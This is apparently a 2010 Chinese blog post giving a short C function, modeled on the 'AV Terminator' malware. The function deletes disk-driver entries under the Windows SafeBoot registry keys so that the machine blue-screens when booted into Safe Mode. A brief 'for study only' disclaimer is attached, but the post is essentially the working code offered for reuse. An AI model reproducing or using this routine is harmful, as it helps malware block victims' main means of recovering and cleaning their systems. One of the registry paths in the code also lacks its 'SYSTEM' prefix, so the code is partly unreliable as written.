破坏安全模式

作者:乱雪 http://hi.baidu.com/lu4nx
参考AV终结者写的一个小函数,直接删注册表的内容,方法很简单,不过网上很少看到有这方面的资料,恢复起来也容易:)
/*
破坏安全模式,by:乱雪
2010.1.24
警告:仅用于技术学习使用,禁止使用到非法用途.
说明:直接通过删除注册表里关键子键达到无法进入安全模式的目的,一进安全模式就蓝屏,参考AV终结者的功能写的.
*/

VOID KillSafeMode()
{
HKEY hKey[5];
::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal",&hKey[1]);
::RegDeleteKey(hKey[1],"{4D36E967-E325-11CE-BFC1-08002BE10318}");

::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network",&hKey[2]);
::RegDeleteKey(hKey[2],"{4D36E967-E325-11CE-BFC1-08002BE10318}");

::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal",&hKey[3]);
::RegDeleteKey(hKey[3],"{4D36E967-E325-11CE-BFC1-08002BE10318}");

::RegOpenKey(HKEY_LOCAL_MACHINE,"CurrentControlSet\\Control\\SafeBoot\\Network",&hKey[4]);
::RegDeleteKey(hKey[4],"{4D36E967-E325-11CE-BFC1-08002BE10318}");

::RegCloseKey(hKey[1]);
::RegCloseKey(hKey[2]);
::RegCloseKey(hKey[3]);
::RegCloseKey(hKey[4]);
}



文章来自: 本站原创
Tags:
评论: 0 | 查看次数: 7354